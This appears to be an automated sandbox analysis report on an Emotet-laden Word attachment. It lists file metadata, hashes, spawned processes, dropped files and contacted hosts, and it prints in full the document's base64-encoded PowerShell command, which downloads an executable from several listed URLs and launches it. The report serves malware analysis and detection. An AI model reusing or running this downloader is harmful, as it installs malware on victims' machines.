File name: | Attachment_20201019_320.doc |
Full analysis: | https://app.any.run/tasks/1a7d5929-8c7a-4bb9-b60e-ea9922c81ae6 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 19, 2020, 23:23:58 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Recusandae., Author: Ambre Jacquet, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 19 17:24:00 2020, Last Saved Time/Date: Mon Oct 19 17:24:00 2020, Number of Pages: 1, Number of Words: 2121, Number of Characters: 12094, Security: 8 |
MD5: | A0A42D997F0098D2216A47F0F0F3A358 |
SHA1: | 2700972DB79F7D8E0269AA6BE5E4FDB4365FE536 |
SHA256: | 9F17846CC14D83122DFDF29194E7FBA592B01F96202C26A7286FC163806C402B |
SSDEEP: | 3072:MJivKie6B/w2yiWydwt8GZ1L/UJFmk+cz9Sd+l4PJhERTM5/oKUQ2t1PuZFiZ5Rv:MJiP/w2PO8GZ1L/Uyk+E9Sd+l4PJhER3 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
LocaleIndicator: | 1033 |
CodePage: | Unicode UTF-16, little endian |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 14187 |
Paragraphs: | 28 |
Lines: | 100 |
Company: | - |
Security: | Locked for annotations |
Characters: | 12094 |
Words: | 2121 |
Pages: | 1 |
ModifyDate: | 2020:10:19 16:24:00 |
CreateDate: | 2020:10:19 16:24:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Ambre Jacquet |
Subject: | - |
Title: | Recusandae. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
544 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Attachment_20201019_320.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1784 | POwersheLL -ENCOD IABTAEUAVAAtAHYAQQByAGkAQQBCAGwAZQAgACgAIgAyADYAIgArACIAOABKAHUAIgArACIANAAiACkAIAAgACgAIAAgAFsAdABZAFAAZQBdACgAJwBTAHkAJwArACcAcwBUACcAKwAnAGUAJwArACcATQAnACsAJwAuAEkATwAuAEQAaQBSAEUAYwB0ACcAKwAnAG8AcgBZACcAKQAgACAAKQAgADsAIAAgACAAJABwAEMAcQA4ADUAcwAgAD0AIAAgAFsAdABZAHAARQBdACgAJwBTAHkAcwBUAEUATQAuAE4AZQB0AC4AcwBlAFIAVgAnACsAJwBpAGMAZQAnACsAJwBQAG8AJwArACcAaQBuACcAKwAnAFQAJwArACcAbQBhAE4AYQAnACsAJwBHAEUAcgAnACkAIAAgADsAIABzAGUAVAAtAEkAVABlAE0AIAAgACgAIgBWAEEAcgBpAEEAYgBMACIAKwAiAEUAOgA5ACIAKwAiAEkAIgArACIAZAB4ACIAKwAiADMAIgApACAAKAAgACAAWwB0AFkAUABlAF0AKAAnAHMAWQAnACsAJwBTAHQAZQBNACcAKwAnAC4ATgBlAHQALgAnACsAJwBzAEUAYwBVAFIAaQBUAFkAcAAnACsAJwByAG8AdAAnACsAJwBvAGMAbwAnACsAJwBsAHQAJwArACcAeQBwAEUAJwApACAAIAApACAAOwAgACQATABzAHoAbwBhAGoAbAA9ACgAJwBNAGEAJwArACcANgBhAGgAMQAnACsAJwB5ACcAKQA7ACQATwB4AG8ANwBkADAAZwA9ACQAVABoAGcAdQBuAGQAcwAgACsAIABbAGMAaABhAHIAXQAoADgAMAAgAC0AIAAzADgAKQAgACsAIAAkAEkAMABnAHAAMAA2AGYAOwAkAEwAZABxAHYAawA0AHUAPQAoACcAUQAnACsAJwB0AHYAcQB4ADAAJwArACcAMAAnACkAOwAgACgAIABWAGEAcgBJAGEAQgBsAGUAIAAoACIAMgA2ACIAKwAiADgASgB1ACIAKwAiADQAIgApACkALgB2AEEATAB1AGUAOgA6AGMAcgBFAEEAVABFAGQAaQByAGUAYwBUAE8AUgBZACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAJwB2ACcAKwAnAFIAYQBOACcAKwAnADkAMABjACcAKwAnAHEAcgAnACsAJwBfACcAKwAnAHYAUgBhAFcAagAnACsAJwA2AGEAJwArACcAZAA2AGgAdgBSAGEAJwApACAALQBjAFIARQBQAEwAYQBDAEUAIAAgACcAdgBSAGEAJwAsAFsAYwBoAEEAcgBdADkAMgApACkAOwAkAFAAcABqADcAeQB4ADkAPQAoACcAWgAnACsAJwBkAGMAYwBjADgAcgAnACkAOwAgACAAKAAgAGcAQwBJACAAIAB2AGEAcgBJAEEAYgBsAGUAOgBwAEMAUQA4ADUAcwAgACAAKQAuAHYAQQBMAHUAZQA6ADoAUwBFAGMAVQByAEkAdABZAHAAUgBvAFQAbwBjAE8ATAAgAD0AIAAgACgAIAAgAHYAQQByAEkAYQBiAGwARQAgACgAIgA5AGkAIgArACIARABYADMAIgApACAAIAAtAHYAQQBMAHUAZQAgACAAKQA6ADoAVABMAHMAMQAyADsAJABXAGYAdgBkAGsAYwBlAD0AKAAnAFIAOQAnACsAJwA5ADYAcwBjADAAJwApADsAJABCAGwAZABiAHkANQA3ACAAPQAgACgAJwBaACcAKwAnAGIANQAnACsAJwB1AHYAagBiACcAKQA7ACQARABjAHYAaAAxAHIAZwA9ACgAJwBCADAAJwArACcAdQBzAG8ANgA3ACcAKQA7ACQASABrAGkAMgAxAGQANwA9ACgAJwBEACcAKwAnAHoAYwBiAGQAOQBiACcAKQA7ACQASwAwADIAMQBzAG0AZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBEAGcAQgBOADkAMABjACcAKwAnAHEAJwArACcAcgBfAEQAZwAnACsAJwBCAFcAJwArACcAagAnACsAJwA2AGEAZAA2AGgARAAnACsAJwBnACcAKwAnAEIAJwApAC0AcgBlAHAAbABhAEMARQAgACAAJwBEAGcAQgAnACwAWwBDAGgAYQByAF0AOQAyACkAKwAkAEIAbABkAGIAeQA1ADcAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAEMAMwAwAGgAcwA5AGoAPQAoACcAVABpACcAKwAnADQAdAAnACsAJwBzAHIAXwAnACkAOwAkAFQAcgBfAGkAMAA1AHUAPQBuAGAARQBXAC0AbwBgAEIAagBgAGUAYwB0ACAAbgBlAHQALgB3AEUAYgBDAGwASQBFAE4AVAA7ACQAUgB3AHEAMgAxAGQAawA9ACgAJwBoAHQAdABwADoALwAnACsAJwAvAGcAdQBhAHIAYQBuAHkAJwArACcALgBuAGUAJwArACcAdAAvACcAKwAnAHoAZQAnACsAJwBmAGkAcgBvACcAKwAnAC8ASwAnACsAJwAvACcAKwAnACoAaAB0AHQAJwArACcAcAA6AC8ALwB3ACcAKwAnAHcAdwAuAHkAYQBuACcAKwAnAGwAaQBwACcAKwAnAGkAbgAuACcAKwAnAG4AJwArACcAZQB0ACcAKwAnAC8AdwBwACcAKwAnAC0AYQBkAG0AJwArACcAaQBuACcAKwAnAC8AUQAnACsAJwAvACoAaAAnACsAJwB0ACcAKwAnAHQAcABzADoALwAvAGEAYQBuACcAKwAnAHMAaAB0AHIAYQB2AGUAbABzAC4AYwBvACcAKwAnAG0ALwBfAG4AbwB0AGUAcwAvAEoATABNACcAKwAnAC8AKgBoAHQAdAAnACsAJwBwAHMAOgAnACsAJwAvAC8AdABjAGEAbQBlAHgAJwArACcAcABvAC4AYwBvACcAKwAnAG0ALwB3ACcAKwAnAHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAJwArACcAbgB0AC8AYwAvACoAJwArACcAaAB0AHQAcABzACcAKwAnADoAJwArACcALwAvACcAKwAnAGUAJwArACcAYQBzAGkAJwArACcAaAAnACsAJwBhAGMAJwArACcAawBzAC4AYwBvAG0ALwB3ACcAKwAnAHAAJwArACcALQAnACsAJwBpAG4AYwBsAHUAZABlAHMALwBkAC8AKgBoAHQAdABwAHMAOgAvAC8AYwBvACcAKwAnAHMAeQAnACsAJwBzACcAKwAnAGgAZQAuAGMAbwBtACcAKwAnAC8AJwArACcAdwBwACcAKwAnAC0AaQBuAGMAbAB1AGQAZQAnACsAJwBzACcAKwAnAC8AQQAnACsAJwA0ADEALwAqACcAKwAnAGgAJwArACcAdAB0ACcAKwAnAHAAcwA6AC8ALwAnACsAJwBnAG8AbwAnACsAJwBkAHAAcgBpAGMAZQAnACsAJwBzAGgAJwArACcAbwAnACsAJwBlAHMALgBjAG8AJwArACcAbQAvAHcAcAAtAGkAJwArACcAbgBjAGwAJwArACcAdQBkAGUAcwAvACcAKwAnADAASwBvAC8AJwApAC4AcwBQAEwAaQBUACgAJABEAGwAaQBsAGIAbABjACAAKwAgACQATwB4AG8ANwBkADAAZwAgACsAIAAkAEYAeQBjAGEAcABmAHcAKQA7ACQAWQAwAG8AdwA3AHoAYQA9ACgAJwBBAGIAYQAnACsAJwBzAGsAbQAnACsAJwBwACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwBtAGkAbwB5AHYAdwAgAGkAbgAgACQAUgB3AHEAMgAxAGQAawApAHsAdAByAHkAewAkAFQAcgBfAGkAMAA1AHUALgBkAG8AdwBOAGwAbwBBAEQAZgBJAGwARQAoACQARwBtAGkAbwB5AHYAdwAsACAAJABLADAAMgAxAHMAbQBmACkAOwAkAFMAOQA4ADQAegAxAHUAPQAoACcAUwA4AF8ANQAnACsAJwA3AGkAMwAnACkAOwBJAGYAIAAoACgAZwBFAHQAYAAtAGkAVABgAGUATQAgACQASwAwADIAMQBzAG0AZgApAC4ATABFAE4ARwB0AGgAIAAtAGcAZQAgADMAMwAyADgANgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwArACcAaQAnACsAJwBuADMAMgBfAFAAcgBvACcAKwAnAGMAZQBzAHMAJwApACkALgBjAHIAZQBBAHQARQAoACQASwAwADIAMQBzAG0AZgApADsAJABTAHcAdQBkAG8AagByAD0AKAAnAFcAJwArACcAawBhAGwAJwArACcAdgAzADcAJwApADsAYgByAGUAYQBrADsAJABKAGwAcwBqADUAcABoAD0AKAAnAE8AOAAnACsAJwBfAHoAJwArACcAaABzADQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABLADcAdgAyADcAdgBsAD0AKAAnAEwAcwAnACsAJwA1AHEAdQAnACsAJwBzAGUAJwApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4CE0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1784 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PBSKE8NNTGUA0PJDU58S.temp | — | |
MD5:— | SHA256:— | |||
1784 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:F17FB243611FC8D2B382ABB444B83A98 | SHA256:B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869 | |||
1784 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1259a1.TMP | binary | |
MD5:F17FB243611FC8D2B382ABB444B83A98 | SHA256:B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869 | |||
544 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B60D0BA24317D732ABFF660F28162C59 | SHA256:120F590E212EEE3ED69612A35E809FE4483A7408CEA6E3D6F2B3F3C35556E30B | |||
544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$tachment_20201019_320.doc | pgc | |
MD5:409F9DACAEA91D783FE193E1E565F739 | SHA256:5853FF4F71E7011BF3B754E0ED73489F624F28AE24556422DC6FED926F632532 | |||
544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:F2EAE10C4CE3FF397FBD41CF0B744FC0 | SHA256:D54A8D57A60513669680C77E8D27E354D71EF4D39F132135AED70956DB9F533C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1784 | POwersheLL.exe | GET | — | 177.12.163.114:80 | http://guarany.net/zefiro/K/ | BR | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1784 | POwersheLL.exe | 177.12.163.114:80 | guarany.net | IPV6 Internet Ltda | BR | suspicious |
Domain | IP | Reputation |
---|---|---|
guarany.net |
| suspicious |